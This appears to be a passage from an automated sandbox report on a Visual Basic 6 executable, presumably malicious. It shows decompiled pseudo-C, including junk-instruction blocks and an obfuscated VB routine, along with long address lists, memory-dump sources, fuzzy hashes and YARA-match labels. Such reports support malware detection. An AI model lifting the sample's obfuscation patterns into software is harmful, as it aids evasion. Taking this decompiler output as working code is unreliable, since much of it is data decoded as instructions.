				_push("VB5!6&*"); // executed
				L004015A2(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t28 = __eax - 1;
				 *_t28 =  *_t28 + _t28;
				 *_t28 =  *_t28 + _t28;
				 *_t28 =  *_t28 + _t28;
				 *((intOrPtr*)(__edi + 0x40a213c6)) =  *((intOrPtr*)(__edi + 0x40a213c6)) + _t28;
				_t29 = __esi;
				_t48 = _t28;
				asm("adc esp, [edx+0x46a3d940]");
				_t39 = 0xa301360f;
				do {
					 *[ss:ebx+0x19cd89] =  *[ss:ebx+0x19cd89] + _t51;
					 *_t29 =  *_t29 + _t29;
					 *_t29 =  *_t29 + _t29;
					 *0xa301360f =  *0xa301360f + _t29;
					 *_t29 =  *_t29 + _t29;
					 *0xFFFFFFFFA301367E =  *((intOrPtr*)(0xffffffffa301367e)) + _t39;
					asm("outsb");
					 *0x726f6620 =  *0x726f6620 & _t34;
					asm("insb");
					asm("popad");
					asm("a16 jae 0x75");
					asm("popad");
					_t48 =  *(__edx + 0x65 + _t48 * 2) * 0x72;
					 *_t29 =  *_t29 + _t29;
					 *(_t34 + 0x6c) =  *(_t34 + 0x6c) & _t29;
					_t51 =  *(_t49 + 0x6e) * 0 - 1;
					 *_t29 =  *_t29 ^ _t29;
					_t39 = 0xd7;
					asm("lodsd");
					asm("daa");
					asm("wait");
					asm("arpl [ebx+edx*4+0x22548ea1], bp");
					_t34 = 0xcc;
					_t29 = _t29 + 0x27fe59ac;
					asm("invalid");
				} while (_t29 < 0);
				_pop(_t44);
				_t31 = _t29;
				asm("stosb");
				 *((intOrPtr*)(_t31 - 0x2d)) =  *((intOrPtr*)(_t31 - 0x2d)) + _t31;
				_t32 = 0x000000cc ^  *0xFFFFFFFF5A130575;
				_t37 = _t31;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				 *_t32 =  *_t32 + _t32;
				if( *_t32 != 0) {
					L6:
					 *((intOrPtr*)(_t32 + _t32)) =  *((intOrPtr*)(_t32 + _t32)) + _t39;
					_push(_t49);
					_push(_t51 - 1);
					_push(_t44);
					_push(_t44);
					_push(_t32);
					_t42 = _t39 + 2 - 1;
					_push(_t37);
					 *_t42 =  *_t42 + _t37;
					 *_t32 =  *_t32 + _t32;
					 *_t37 =  *_t37 + _t32;
					asm("adc eax, 0x746c0000");
					 *_t32 =  *_t32 + _t32;
					asm("adc eax, 0x0");
					 *_t32 =  *_t32 + _t32;
					_t33 = _t32 +  *_t32;
					 *_t33 =  *_t33 & _t33;
					 *_t33 =  *_t33 + _t33;
					 *_t33 =  *_t33 + _t33;
					 *_t33 =  *_t33 & _t33;
					 *_t33 =  *_t33 + _t33;
					 *[es:eax] =  *[es:eax] + _t33;
					 *_t33 =  *_t33 + _t44 + 1;
					asm("adc [eax], al");
					 *_t42 =  *_t42 + _t33;
					 *_t33 =  *_t33 + _t33;
					 *((intOrPtr*)(_t33 + 4)) =  *((intOrPtr*)(_t33 + 4)) + _t42;
					 *_t33 =  *_t33 + _t33;
					asm("into");
					asm("adc [eax], al");
					 *_t33 =  *_t33 + _t42;
					 *_t33 =  *_t33 + _t33;
					 *_t33 =  *_t33 + _t33;
					 *_t33 =  *_t33 + _t33;
					 *_t33 =  *_t33 + _t33;
					 *_t33 =  *_t33 + _t33;
					 *_t33 =  *_t33 + _t33;
					 *_t33 =  *_t33 & _t33;
					 *_t33 =  *_t33 + _t33;
					 *_t33 =  *_t33 + _t33;
					 *_t33 =  *_t33 + _t33;
					 *_t33 =  *_t33 + _t33;
					 *_t33 =  *_t33 + _t33;
					 *_t33 =  *_t33 + _t33;
				} else {
					 *_t32 =  *_t32 + _t32;
					_t33 = _t44;
					_t44 = _t32;
					asm("adc eax, 0xb000000");
					_t18 = _t44 + 0x6e;
					 *_t18 =  *((intOrPtr*)(_t44 + 0x6e)) + _t33;
					if( *_t18 < 0) {
						_t49 =  *(_t48 + 0x67) * 0x736e65;
						_t32 = _t33 | 0x55000c01;
						goto L6;
					}
				}
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
				 *_t33 =  *_t33 + _t33;
			}

0x004015a8
0x004015a8
0x004015ad
0x004015b2
0x004015b4
0x004015b6
0x004015b8
0x004015ba
0x004015bc
0x004015bd
0x004015bf
0x004015c1
0x004015c3
0x004015c4
0x004015c4
0x004015c6
0x004015cc
0x004015ce
0x004015ce
0x004015d5
0x004015d7
0x004015d9
0x004015db
0x004015dd
0x004015e0
0x004015e1
0x004015e7
0x004015e8
0x004015e9
0x004015ec
0x004015ef
0x004015f4
0x004015f6
0x00401600
0x00401602
0x00401609
0x0040160d
0x0040160e
0x0040160f
0x00401610
0x00401617
0x00401619
0x0040161e
0x0040161e
0x00401624
0x0040162e
0x00401630
0x00401631
0x00401634
0x00401634
0x00401635
0x00401637
0x00401639
0x0040163b
0x0040163d
0x0040163f
0x00401641
0x00401643
0x00401645
0x00401647
0x00401649
0x0040164b
0x0040164d
0x0040164f
0x00401651
0x00401653
0x00401655
0x00401657
0x00401659
0x00401671
0x00401671
0x00401674
0x00401676
0x00401677
0x00401679
0x0040167b
0x0040167c
0x0040167f
0x00401680
0x00401682
0x00401685
0x00401687
0x0040168d
0x0040168f
0x00401695
0x00401697
0x00401699
0x0040169b
0x0040169d
0x0040169f
0x004016a3
0x004016a5
0x004016a8
0x004016aa
0x004016ac
0x004016ae
0x004016b0
0x004016b3
0x004016b5
0x004016b6
0x004016b8
0x004016ba
0x004016bc
0x004016be
0x004016c0
0x004016c3
0x004016c5
0x004016c7
0x004016c9
0x004016cb
0x004016cd
0x004016cf
0x004016d1
0x004016d3
0x0040165b
0x0040165b
0x0040165d
0x0040165d
0x0040165e
0x00401663
0x00401663
0x00401666
0x00401669
0x00401670
0x00000000
0x00401670
0x00401666
0x004016d5
0x004016d7
0x004016d9
0x004016db
0x004016dd
0x004016df
0x004016e1
0x004016e3
0x004016e5
0x004016e7
0x004016e9
0x004016eb
0x004016ed
0x004016ef
0x004016f1
0x004016f3
0x004016f5
0x004016f7
0x004016f9
0x004016fb
0x004016fd
0x004016ff
0x00401701
0x00401703
0x00401705
0x00401707
0x00401709
0x0040170b
0x0040170d
0x0040170f
0x00401711
0x00401713
0x00401715
0x00401717
0x00401719
0x0040171b
0x0040171d
0x0040171f
0x00401721
0x00401723
0x00401725
0x00401727
0x00401729
0x0040172b
0x0040172d
0x0040172f
0x00401731
0x00401733
0x00401735
0x00401737
0x00401739
0x0040173b
0x0040173d
0x0040173f
0x00401741
0x00401743
0x00401745
0x00401747
0x00401749
0x0040174b
0x0040174d
0x0040174f
0x00401751
0x00401753
0x00401755
0x00401757
0x00401759
0x0040175b
0x0040175d
0x0040175f
0x00401761
0x00401763
0x00401765
0x00401767
0x00401769
0x0040176b
0x0040176d
0x0040176f
0x00401771
0x00401773
0x00401775
0x00401777
0x00401779
0x0040177b
0x0040177d
0x0040177f
0x00401781
0x00401783
0x00401785
0x00401787
0x00401789
0x0040178b
0x0040178d
0x0040178f
0x00401791
0x00401793
0x00401795
0x00401797
0x00401799
0x0040179b
0x0040179d
0x0040179f
0x004017a1
0x004017a3
0x004017a5
0x004017a7
0x004017a9
0x004017ab
0x004017ad
0x004017af
0x004017b1
0x004017b3
0x004017b5
0x004017b7
0x004017b9
0x004017bb
0x004017bd
0x004017bf
0x004017c1
0x004017c3
0x004017c5
0x004017c7
0x004017c9
0x004017cb
0x004017cd
0x004017cf
0x004017d1
0x004017d3
0x004017d5
0x004017d7
0x004017d9
0x004017db
0x004017dd
0x004017df
0x004017e1
0x004017e3
0x004017e5
0x004017e7
0x004017e9
0x004017eb
0x004017ed
0x004017ef
0x004017f1
0x004017f3
0x004017f5
0x004017f7
0x004017f9
0x004017fb
0x004017fd
0x004017ff
0x00401801
0x00401803
0x00401804
0x00401806
0x00401808
0x0040180a
0x0040180c
0x0040180e
0x00401810
0x00401812
0x00401814
0x00401816
0x00401818
0x0040181a
0x0040181c
0x0040181e
0x00401820
0x00401822

APIs

#100.MSVBVM60(VB5!6&*), ref: 004015AD

Strings

VB5!6&*, xrefs: 004015A8

Memory Dump Source

Source File: 00000000.00000002.1191410623.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1191406489.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1191427193.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1191433235.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 99f167803b2b7949e1b37ab962ee79120b01c7b5c5684e6b55fb936104019367
Instruction ID: 3968659e319cf5140d6aebb13d420954a7f40246c30739ac830b44509bc233bc
Opcode Fuzzy Hash: 99f167803b2b7949e1b37ab962ee79120b01c7b5c5684e6b55fb936104019367
Instruction Fuzzy Hash: E841EEA248E3C15FC3038BB18D6A1517FB4AE13218B5E40EBC4C1CF1A3E25D980AD7A6

Uniqueness

Uniqueness Score: -1.00%

Function 00403A94, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1191410623.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1191406489.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1191427193.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1191433235.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ec90c4648f99e84c7ed0e1d18183dabde80dd2c2de74fb557dcd3775fdaedc9
Instruction ID: 950c7d076fa7cf2664c9a75f8f5ea7323ee124cff1cb75a8c93bfe4287a8afb1
Opcode Fuzzy Hash: 6ec90c4648f99e84c7ed0e1d18183dabde80dd2c2de74fb557dcd3775fdaedc9
Instruction Fuzzy Hash: EAB01220388102FEE2188AE84DC182025C493043D23200C33F880F11E0CAFCCE408B2D

Uniqueness

Uniqueness Score: -1.00%

Function 00403B8C, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1191410623.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1191406489.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1191427193.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1191433235.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 637ebcacc484672f6ea51517f93211a78d35ffa1c0b46cbdb2f43994f593094d
Instruction ID: 23df7f5ce0a2e55a8cefeacf69b2d4304b7ea7eedd3de9194476117a92d32d97
Opcode Fuzzy Hash: 637ebcacc484672f6ea51517f93211a78d35ffa1c0b46cbdb2f43994f593094d
Instruction Fuzzy Hash: 8AB01220394242FAE614CEA95C8282439E4E2007CA3B00C33F810E11E2CBFCEF00812D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 022C3719, Relevance: 1.5, Strings: 1, Instructions: 235COMMON

Download Yara Rule

Strings

l, xrefs: 022C3A30

Memory Dump Source

Source File: 00000000.00000002.1191692194.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: l
API String ID: 0-2517025534
Opcode ID: d4ef704bf7e71366be8c3db1a9c8c73c4db0425f6613c32dd2009e556ca1d2e1
Instruction ID: e84397266c93b17e0a28a9bedbdb38fda5d5972f54d0c8743b171c8ea5771696
Opcode Fuzzy Hash: d4ef704bf7e71366be8c3db1a9c8c73c4db0425f6613c32dd2009e556ca1d2e1
Instruction Fuzzy Hash: B391497161034ACFDB34DE69CD953EA77E2AF94310F61862ECC8D9B648D3709A81CB46

Uniqueness

Uniqueness Score: -1.00%

Function 022C4413, Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

o%a, xrefs: 022BC9B8

Memory Dump Source

Source File: 00000000.00000002.1191692194.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: o%a
API String ID: 0-1786893600
Opcode ID: 0c54db9cb5b0aa460e4024a8f69628c2ce0fee7c72f3d84e6f77795c2dedb48d
Instruction ID: e2384a087f22908f20847f312e048bff24e4cef032660228f773b2e1b49ce807
Opcode Fuzzy Hash: 0c54db9cb5b0aa460e4024a8f69628c2ce0fee7c72f3d84e6f77795c2dedb48d
Instruction Fuzzy Hash: DB316971620245CFCB75BEB48D693EA77A1AF95350F61462FCC47AB148C7340A40CB42

Uniqueness

Uniqueness Score: -1.00%

Function 022C4BA5, Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

w, xrefs: 022C4DE9

Memory Dump Source

Source File: 00000000.00000002.1191692194.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: w
API String ID: 0-476252946
Opcode ID: aaf7f0541f7abd57b8732e9444c53052bef3c61ebbaa73deace7424a43854d85
Instruction ID: d1fbe356f0f1bc10ae444c1561a4158c40401e061105f8fbbc6683a53ecf4bd3
Opcode Fuzzy Hash: aaf7f0541f7abd57b8732e9444c53052bef3c61ebbaa73deace7424a43854d85
Instruction Fuzzy Hash: C121083861834BCFCB24AFA8D8E07E773A1EF59304F95462DD9598B306E3705805C714

Uniqueness

Uniqueness Score: -1.00%

Function 022C334E, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1191692194.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 466c4574adfc9f0e2c0eadbbf8581ea419819a8b3690d3d1e921eea1eda9d432
Instruction ID: 7aff0472517e00853f44f8e307a6288801caa9355037a78483e628b7db113a1a
Opcode Fuzzy Hash: 466c4574adfc9f0e2c0eadbbf8581ea419819a8b3690d3d1e921eea1eda9d432
Instruction Fuzzy Hash: 7F01227A221784DFCB35DF14C994ADD73A4AF58324F96899ADC098B315C330AA40CB96

Uniqueness

Uniqueness Score: -1.00%

Function 022C2989, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1191692194.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b92e0429d5ba92d8713b4ba426dc31c874b11707179926314194ef962cb2349
Instruction ID: a33ad0646db4d117ee71befedfaf3f0bcf99b4d279a8e703ef4713df39d7da03
Opcode Fuzzy Hash: 5b92e0429d5ba92d8713b4ba426dc31c874b11707179926314194ef962cb2349
Instruction Fuzzy Hash: B3B0923C222A808FC245CA08C290E00B3A0FB04700FD11880E42287A11C228E8408910

Uniqueness

Uniqueness Score: -1.00%

Function 0041FBDD, Relevance: 91.4, APIs: 50, Strings: 2, Instructions: 369
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E0041FBDD(void* __ebx, void* __edi, void* __esi, void* _a24, signed int* _a28) {
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				signed int _v60;
				char _v64;
				char _v68;
				intOrPtr _v76;
				char _v84;
				char _v100;
				char* _v108;
				char _v116;
				void* _v120;
				signed int _v124;
				void* _v128;
				signed int _v132;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr _v156;
				intOrPtr* _v160;
				signed int _v164;
				signed int _v168;
				intOrPtr* _v172;
				signed int _v176;
				intOrPtr* _v180;
				signed int _v184;
				intOrPtr* _v188;
				signed int _v192;
				signed int _v196;
				intOrPtr* _v200;
				signed int _v204;
				signed int* _t187;
				short _t190;
				char* _t193;
				char* _t198;
				signed int _t202;
				signed int _t203;
				char* _t207;
				signed int _t211;
				signed int _t224;
				signed int _t229;
				char* _t234;
				signed int _t238;
				signed int _t247;
				signed int _t252;
				void* _t301;
				intOrPtr _t302;
				intOrPtr _t322;

				_t302 = _t301 - 0xc;
				_push(0x401356);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t302;
				L00401350();
				_v16 = _t302;
				_v12 = 0x401298;
				L004014E2();
				_t187 = _a28;
				 *_t187 =  *_t187 & 0x00000000;
				_t322 =  *0x401294;
				asm("fcomp dword [0x401290]");
				asm("fnstsw ax");
				asm("sahf");
				if( *_t187 < 0) {
					_v76 = 0x80020004;
					_v84 = 0xa;
					_push( &_v84);
					L0040148E();
					_v32 = _t322;
					L0040157E();
					if( *0x4223fc != 0) {
						_v160 = 0x4223fc;
					} else {
						_push(0x4223fc);
						_push(0x403c68);
						L00401578();
						_v160 = 0x4223fc;
					}
					_v120 =  *_v160;
					_t247 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v68);
					asm("fclex");
					_v124 = _t247;
					if(_v124 >= 0) {
						_v164 = _v164 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c58);
						_push(_v120);
						_push(_v124);
						L00401572();
						_v164 = _t247;
					}
					_v128 = _v68;
					_t252 =  *((intOrPtr*)( *_v128 + 0xd0))(_v128,  &_v60);
					asm("fclex");
					_v132 = _t252;
					if(_v132 >= 0) {
						_v168 = _v168 & 0x00000000;
					} else {
						_push(0xd0);
						_push(0x403c78);
						_push(_v128);
						_push(_v132);
						L00401572();
						_v168 = _t252;
					}
					_v144 = _v60;
					_v60 = _v60 & 0x00000000;
					L00401560();
					L0040156C();
				}
				_push( &_v84);
				L00401488();
				_v108 = L"skuddermudderets";
				_v116 = 0x8008;
				_push( &_v84);
				_t190 =  &_v116;
				_push(_t190);
				L0040158A();
				_v120 = _t190;
				L0040157E();
				if(_v120 != 0) {
					if( *0x422010 != 0) {
						_v172 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x403270);
						L00401578();
						_v172 = 0x422010;
					}
					_t234 =  &_v68;
					L00401566();
					_v120 = _t234;
					_t238 =  *((intOrPtr*)( *_v120 + 0x150))(_v120,  &_v60, _t234,  *((intOrPtr*)( *((intOrPtr*)( *_v172)) + 0x300))( *_v172));
					asm("fclex");
					_v124 = _t238;
					if(_v124 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x150);
						_push(0x403c88);
						_push(_v120);
						_push(_v124);
						L00401572();
						_v176 = _t238;
					}
					_push(_v36);
					_push(L"cheve");
					L00401518();
					L00401560();
					_push(_t238);
					_push(_v60);
					L00401518();
					L00401560();
					_push( &_v60);
					_push( &_v64);
					_push(2);
					L0040151E();
					_t302 = _t302 + 0xc;
					L0040156C();
					_push(0xa9);
					L00401482();
					L00401560();
				}
				_push( &_v84);
				L00401476();
				_t193 =  &_v84;
				_push(_t193);
				L0040147C();
				_v120 =  ~(0 | _t193 < 0x00000000);
				L0040157E();
				if(_v120 != 0) {
					if( *0x422010 != 0) {
						_v180 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x403270);
						L00401578();
						_v180 = 0x422010;
					}
					_t207 =  &_v68;
					L00401566();
					_v120 = _t207;
					_t211 =  *((intOrPtr*)( *_v120 + 0x110))(_v120,  &_v60, _t207,  *((intOrPtr*)( *((intOrPtr*)( *_v180)) + 0x30c))( *_v180));
					asm("fclex");
					_v124 = _t211;
					if(_v124 >= 0) {
						_v184 = _v184 & 0x00000000;
					} else {
						_push(0x110);
						_push(0x403cf4);
						_push(_v120);
						_push(_v124);
						L00401572();
						_v184 = _t211;
					}
					_v148 = _v60;
					_v60 = _v60 & 0x00000000;
					_v76 = _v148;
					_v84 = 8;
					_push(0xbf);
					_push( &_v84);
					_push( &_v100);
					L00401470();
					_push( &_v100);
					L004014DC();
					L00401560();
					L0040156C();
					_push( &_v100);
					_push( &_v84);
					_push(2);
					L0040153C();
					if( *0x4223fc != 0) {
						_v188 = 0x4223fc;
					} else {
						_push(0x4223fc);
						_push(0x403c68);
						L00401578();
						_v188 = 0x4223fc;
					}
					_v120 =  *_v188;
					_t224 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v68);
					asm("fclex");
					_v124 = _t224;
					if(_v124 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c58);
						_push(_v120);
						_push(_v124);
						L00401572();
						_v192 = _t224;
					}
					_v128 = _v68;
					_t229 =  *((intOrPtr*)( *_v128 + 0xf8))(_v128,  &_v60);
					asm("fclex");
					_v132 = _t229;
					if(_v132 >= 0) {
						_v196 = _v196 & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x403c78);
						_push(_v128);
						_push(_v132);
						L00401572();
						_v196 = _t229;
					}
					_v152 = _v60;
					_v60 = _v60 & 0x00000000;
					L00401560();
					L0040156C();
				}
				if( *0x422010 != 0) {
					_v200 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v200 = 0x422010;
				}
				_t198 =  &_v68;
				L00401566();
				_v120 = _t198;
				_t202 =  *((intOrPtr*)( *_v120 + 0xa0))(_v120,  &_v60, _t198,  *((intOrPtr*)( *((intOrPtr*)( *_v200)) + 0x300))( *_v200));
				asm("fclex");
				_v124 = _t202;
				if(_v124 >= 0) {
					_v204 = _v204 & 0x00000000;
				} else {
					_push(0xa0);
					_push(0x403c88);
					_push(_v120);
					_push(_v124);
					L00401572();
					_v204 = _t202;
				}
				_t203 = _v60;
				_v156 = _t203;
				_v60 = _v60 & 0x00000000;
				L00401560();
				L0040156C();
				asm("wait");
				_push(0x42018f);
				L00401554();
				L00401554();
				L00401554();
				L00401554();
				L00401554();
				L00401554();
				return _t203;
			}

0x0041fbe0
0x0041fbe3
0x0041fbee
0x0041fbef
0x0041fbfb
0x0041fc03
0x0041fc06
0x0041fc13
0x0041fc18
0x0041fc1b
0x0041fc1e
0x0041fc24
0x0041fc2a
0x0041fc2c
0x0041fc2d
0x0041fc33
0x0041fc3a
0x0041fc44
0x0041fc45
0x0041fc4a
0x0041fc50
0x0041fc5c
0x0041fc79
0x0041fc5e
0x0041fc5e
0x0041fc63
0x0041fc68
0x0041fc6d
0x0041fc6d
0x0041fc8b
0x0041fc9a
0x0041fc9d
0x0041fc9f
0x0041fca6
0x0041fcc2
0x0041fca8
0x0041fca8
0x0041fcaa
0x0041fcaf
0x0041fcb2
0x0041fcb5
0x0041fcba
0x0041fcba
0x0041fccc
0x0041fcdb
0x0041fce1
0x0041fce3
